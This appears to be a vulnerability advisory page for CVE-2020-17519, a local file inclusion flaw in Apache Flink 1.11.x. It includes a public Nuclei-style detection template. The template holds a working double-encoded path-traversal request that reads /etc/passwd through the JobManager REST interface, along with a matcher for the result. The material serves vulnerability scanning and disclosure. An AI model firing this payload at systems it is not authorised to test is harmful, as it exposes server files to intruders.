漏洞描述
Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
CVE-2020-17519: Apache Flink - Local File Inclusion
PoC代码[已公开]
id: CVE-2020-17519
info:
name: Apache Flink - Local File Inclusion
author: pdteam
severity: high
description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
remediation: |
Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.
reference:
- https://github.com/B1anda0/CVE-2020-17519
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-17519
cwe-id: CWE-552
epss-score: 0.94383
epss-percentile: 0.99965
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: flink
tags: cve,cve2020,apache,lfi,flink,kev
http:
- method: GET
path:
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402204856106aadde6078326ab97a094ebab3eccff5022a8283c6185d0a7fff396a4302203284b83c9e2626773e5b0dc14e38d326008a9f311c5b9cedb00072c81b1b9d6e:922c64590222798bb761d5b6d8e72950